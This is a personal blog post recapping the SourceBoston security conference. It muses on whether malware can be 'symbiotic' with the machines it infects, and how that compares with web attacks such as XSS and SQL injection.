Whelp, I just concluded my rather long trip to Boston for the first annual SourceBoston conference. I actually had a great time. There were a few bugs in the conference here and there, but that’s not unexpected for any first-time conference (totally forgivable). I expect it to grow quite a bit in the future to given the quality talks I heard there. The talks were almost without exception technical or business oriented enough that I had a difficult time picking and choosing which ones I wanted to go to. So much so that this was the very first time I’ve ended up buying a talk after the conference was over. I’m glad I did too. The telephone defenses talk by James Atkinson was excellent - long (2.25 hours) but excellent.
The keynotes were all great, but the one that really stood out in my mind was the talk by Dan Geer. It was a fast speech with a lot of specifics about the correlation between genetics/biology and viral/worm propagation. Later that evening a bunch of the more technical/business people were asked to go to a dinner with Polaris Ventures. There I got a chance to speak with Dan a little more and gently chastised him for not mentioning Samy, which I think intrigued him.
After the dinner, I began thinking about one concept that was mentioned during Dan’s talk and was echoed a number of times during the dinner and then again the next day. The concept was around the fact that in some networks we are seeing a change between parasitic malicious software to symbiotic malicious software. That is, some of the best maintained machines are run by attackers. They are up to date, patched, the logs aren’t writing off the end of the disc, etc… Because bad guys take a great deal of pride and care in their machines, trying to keep other hackers off the boxes. They end up doing quite a bit of defense to insure they have the ability to maintain and control the box.
Okay, here’s where it gets really weird. Now let’s take that to it’s next logical bizarre conclusion - often machines are healthier with an attacker on it than without. In fact, bad guys really do their best to make sure they aren’t saturating the connection or making the machine too slow. It’s in their best interest to have their control over the machine persist. It’s a strange malicious harmony, where the host is fed and nourished by the aggressor organism. But that only really makes sense when an attacker has access to the system and can control the inner workings of the computer itself. Are there any parallels between this and web application security?
I’ve thought about this quite a bit over the last few days and I can’t come up with a single real world instance of where a malicious attack that doesn’t involve some level of OS compromise has been healthy for the host system in any way. Once you begin talking about remote file includes and command injection it’s the same thing as a typical worm or virus scenario, where the attacker may take a great deal of time and energy to protect the system, leaving only small back doors for themselves to recover control at will. But all the compromises that don’t allow for any form of system/OS level control have only damaging effects. XSS worms, CSRF, SQL injection, etc… None of which have any positive effects on the host system.
But each of those classes of vulnerabilities also share one other thing - with the exception of persistent XSS/HTML injection or changes to the database they each have very little longevity compared to OS compromises. Adding an account in a database clearly can persist indefinitely, but more often than not a bad guy is less interested in adding to a database than they are extracting information out of it, meaning the longevity is an afterthought. Persistent XSS that performs overtly malicious actions is typically uncovered quickly because of the real-time effects it typically has against the normal user base.
With that in mind, it would appear to be that the less persistent the attack the worse it is for the host system in terms of any tangible side benefits the attacker can bring to the table. There is little to no symbiosis in these forms of web application attacks. Now clearly you’d say it’s better to have an XSS attack than a computer compromise, and I’m not naive enough to think bad guys really care about the system. Rather their interests lie in maintaining control over their assets, which is an issue of economic loss aversion. But I definitely think there is some interesting side effects of malicious attacks here that are worth thinking through a little more.
Further, one rather interesting argument I’ve heard for protecting machines is for increased OS longevity, which costs enterprises less because of productivity loss when machine re-installs are required. This really is more of a problem when rampant spyware begins to slow down a machine to where it becomes almost unusable, or even unstable because of the poor quality of the spyware code requiring the owner to complain to their IT department. In that case it’s parasitic software. So perhaps what we are really interested in is stopping parasitic software and encouraging symbiotic software to lower IT costs. As long as the machine contains nothing sensitive it would end up driving down support costs, if there were no other negative effects, like having your IP space black holed for sending out too much spam. It sounds crazy, I know.
Jeremiah and I were talking about this with Dan from Polaris yesterday though. If you could somehow get someone to use XSS as a way to do compute type for processor intensive operations you could potentially sell that to people who have high levels of computational needs. I like that idea less than offering a free download to users for the processor or slice of bandwidth when not in use (symbiotic), in trade for hardening the machine against purely malicious (parasitic) attackers. We’ve seen things like this in the past, SETI at home, and the RC5 distributed cracking… but I consider both of those to be parasitic, offering little to nothing to the host machine. Interesting thought, anyway…